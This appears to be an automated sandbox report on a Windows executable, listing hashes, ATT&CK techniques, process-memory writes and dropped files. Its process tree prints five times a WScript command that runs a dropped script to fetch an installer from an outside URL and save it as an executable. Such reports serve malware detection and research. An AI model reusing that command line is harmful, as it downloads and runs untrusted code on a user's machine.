83d8c327e238ee626c91c5a8c7367397b7a9a1d67efc2ead6cfd5b99c38fe40b

Analysis

max time kernel
121s
max time network
122s
platform
windows7_x64
resource
win7-20240215-en
resource tags

arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
submitted
05/06/2024, 18:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

98e5efeeb4ce2069026f6c48b086a831_JaffaCakes118.exe
Size

184KB
MD5

98e5efeeb4ce2069026f6c48b086a831
SHA1

36694cf29b7163eeccfefaf9a8df83239c249395
SHA256

83d8c327e238ee626c91c5a8c7367397b7a9a1d67efc2ead6cfd5b99c38fe40b
SHA512

991fd0f42485b6a43bd8de7eba0d1735915c7134f60b20ab9247a7b604d424e0a30fb3884cfc904284419f6f255c11cc264f13c2ddf725e23bf682cd2b1c3a4b
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3Z:/7BSH8zUB+nGESaaRvoB7FJNndn4

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 12 IoCs

flow	pid	Process
6	2556	WScript.exe
8	2556	WScript.exe
10	2556	WScript.exe
12	2488	WScript.exe
13	2488	WScript.exe
15	1556	WScript.exe
16	1556	WScript.exe
19	2140	WScript.exe
20	2140	WScript.exe
24	2780	WScript.exe
25	2780	WScript.exe
27	2780	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 1704 wrote to memory of 2556	1704	98e5efeeb4ce2069026f6c48b086a831_JaffaCakes118.exe	28
PID 1704 wrote to memory of 2556	1704	98e5efeeb4ce2069026f6c48b086a831_JaffaCakes118.exe	28
PID 1704 wrote to memory of 2556	1704	98e5efeeb4ce2069026f6c48b086a831_JaffaCakes118.exe	28
PID 1704 wrote to memory of 2556	1704	98e5efeeb4ce2069026f6c48b086a831_JaffaCakes118.exe	28
PID 1704 wrote to memory of 2488	1704	98e5efeeb4ce2069026f6c48b086a831_JaffaCakes118.exe	30
PID 1704 wrote to memory of 2488	1704	98e5efeeb4ce2069026f6c48b086a831_JaffaCakes118.exe	30
PID 1704 wrote to memory of 2488	1704	98e5efeeb4ce2069026f6c48b086a831_JaffaCakes118.exe	30
PID 1704 wrote to memory of 2488	1704	98e5efeeb4ce2069026f6c48b086a831_JaffaCakes118.exe	30
PID 1704 wrote to memory of 1556	1704	98e5efeeb4ce2069026f6c48b086a831_JaffaCakes118.exe	32
PID 1704 wrote to memory of 1556	1704	98e5efeeb4ce2069026f6c48b086a831_JaffaCakes118.exe	32
PID 1704 wrote to memory of 1556	1704	98e5efeeb4ce2069026f6c48b086a831_JaffaCakes118.exe	32
PID 1704 wrote to memory of 1556	1704	98e5efeeb4ce2069026f6c48b086a831_JaffaCakes118.exe	32
PID 1704 wrote to memory of 2140	1704	98e5efeeb4ce2069026f6c48b086a831_JaffaCakes118.exe	34
PID 1704 wrote to memory of 2140	1704	98e5efeeb4ce2069026f6c48b086a831_JaffaCakes118.exe	34
PID 1704 wrote to memory of 2140	1704	98e5efeeb4ce2069026f6c48b086a831_JaffaCakes118.exe	34
PID 1704 wrote to memory of 2140	1704	98e5efeeb4ce2069026f6c48b086a831_JaffaCakes118.exe	34
PID 1704 wrote to memory of 2780	1704	98e5efeeb4ce2069026f6c48b086a831_JaffaCakes118.exe	36
PID 1704 wrote to memory of 2780	1704	98e5efeeb4ce2069026f6c48b086a831_JaffaCakes118.exe	36
PID 1704 wrote to memory of 2780	1704	98e5efeeb4ce2069026f6c48b086a831_JaffaCakes118.exe	36
PID 1704 wrote to memory of 2780	1704	98e5efeeb4ce2069026f6c48b086a831_JaffaCakes118.exe	36

C:\Users\Admin\AppData\Local\Temp\98e5efeeb4ce2069026f6c48b086a831_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\98e5efeeb4ce2069026f6c48b086a831_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1704
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1258.js" http://www.djapp.info/?domain=VTivybhITx.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1258.exe
  2⤵
  - Blocklisted process makes network request
  PID:2556
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1258.js" http://www.djapp.info/?domain=VTivybhITx.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1258.exe
  2⤵
  - Blocklisted process makes network request
  PID:2488
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1258.js" http://www.djapp.info/?domain=VTivybhITx.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1258.exe
  2⤵
  - Blocklisted process makes network request
  PID:1556
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1258.js" http://www.djapp.info/?domain=VTivybhITx.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1258.exe
  2⤵
  - Blocklisted process makes network request
  PID:2140
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1258.js" http://www.djapp.info/?domain=VTivybhITx.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1258.exe
  2⤵
  - Blocklisted process makes network request
  PID:2780

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
2207fdb9365e8bf6f92021690a873e34

SHA1
34d9c78071ae453464bc054fd6f1dd33b95691fb

SHA256
fc907f09ce3123611eee9b93542d7b495678c4ddbeac54ed6f5f152e881e8411

SHA512
d48a61791bd4ae61ff8ac9c0ebd74a29a3f7eb5961036aa08ba8eae783c1dfab133bb2e94a29b0a29171ee2969e0c13df80b22c2962d420de61a12f2ce6b4a9a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
f59297ebb1be7cb5e006b60d334546eb

SHA1
74eb2353e214144a473ad907dd32b3e4670e8db9

SHA256
47c6fc5ce81a2f4564475a17ac370278d0fd4c81bd4550e93ed74bbfb17d8116

SHA512
82d949d6de163a96fd67c4a897b7db4d53dc383edc43de3d7c4deb173541ba17ce47e8b699b9ed09e58857e9b662e33d9c630c07a8be0ac6204abe9616624271

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
61d3bcc2e1dc708f5850989eec51bd82

SHA1
ab95e1df690ecceef77f9b4a146aeef393330a2f

SHA256
bef6d746a55aa01ca842e063675a96574f48046096deb19be0df9fcc6b3306ab

SHA512
3fab1ec9511151ead926eefa813a3391eba4e2cf1442789f0a296816313e8fb3aa17b6682b4961082377614a2f56870b840e49b7ea342bab076562bf6fc5e9c8

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
392B

MD5
9541679460860310a1d26e89f5d703d8

SHA1
4cf75df91065f366a870f782345a31ef5e2dfef3

SHA256
feb7ca60169b1c72a083058cb9dbde00b178432584c7f2abc2825ce582e96c35

SHA512
f8a8a78589cd55558f2316d3240cdf178c3241557c1926cdfcb8ef63f02bcf35f15b4b95b28970020e17f6d1f9257c89a3aae5bca53d33c8f74484ed10d1fd0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\902LKC6A\domain_profile[1].htm

Filesize
6KB

MD5
15977be7e972a87b00049189bbb73d5a

SHA1
4f3a1bbca2b206c9c9bcccae0138a7447cbdab70

SHA256
bf2f88c24fb1ba874ea2455be84aecde8d4e63f8d22178f77e153847a4331027

SHA512
97fcc9145698b003bcb0b11f63443d71cca336814efbcb0d4a897d86a89eb07fb40c2bf5b5e9958d76224f86deafd42becf02a4361fefe01b644c4c0f019070e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\902LKC6A\domain_profile[1].htm

Filesize
6KB

MD5
f7f6fd8995aea2667e1d7161c15d4e3b

SHA1
4150d63cb2725e71cba01f9322e18ae7fe4e4597

SHA256
1b35dedc41bc16332ee3567b1be0ba29911113c7dc01c56406f99af1b5387779

SHA512
ad76dcee82768bbe77902780a680c9f82b8d9dd5ff44d7963f0753013350cd1ab6cb9cc7eaa8a26fd702a523222cd26fb013d15643155e8a1803e77be43b2807

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OOWQLMJV\domain_profile[1].htm

Filesize
40KB

MD5
eb8d360609effdb77ad773d63b0fcf32

SHA1
2d08ca6a1516a7ce928a01a11edd50bf9ff34fa2

SHA256
e0d2f24a59f7cd8994eabc83ad6b0bfb856c3676ecbc9815b2a40d1a4a8a7f23

SHA512
d57f9a30ecd56d8033db843ffba23a395184054d80547b6106edc7cd6bc02a9bd7ec45feb00d84c7768ecff2a170dcbbd00d0a1329ece2cb33c150e3a16890c7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OOWQLMJV\domain_profile[1].htm

Filesize
40KB

MD5
f2b4ceb91089b232d446310bd6e5897d

SHA1
f0b16c4b377e5edb7478f9e4aa9adb7b0ef9b288

SHA256
4bc8377db4038af73df81f029166fae3efc6bbf5caef7048e12a95ad545eee93

SHA512
eba429dd620fd6e6bbd8cc8b127b546a6980b248822831b059d0bd873f3b73237002b7cdf478df71eece35065d12821969b9ff137f6dea89242f2c2fceb3152b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab41B2.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar66EE.tmp

Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf1258.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\KBSBHRW6.txt

Filesize
177B

MD5
368adcc30eaf2b09c0f0494804522c98

SHA1
9a5e9eacce2f6d02803719e6cf1f62dc0648da90

SHA256
f581ef4e2cacbdd382edf2ac7ffc78892d68111081141b2f4ebd44c59cd9ac44

SHA512
a6b4b1ce33c291172d1ddf94de1cb57181d7d0187b9385222453072fe8c053d4488f3955dbcdfc213c21de762aadf54116f4bab588e9b3efd92c82b1e86af329

Download Submit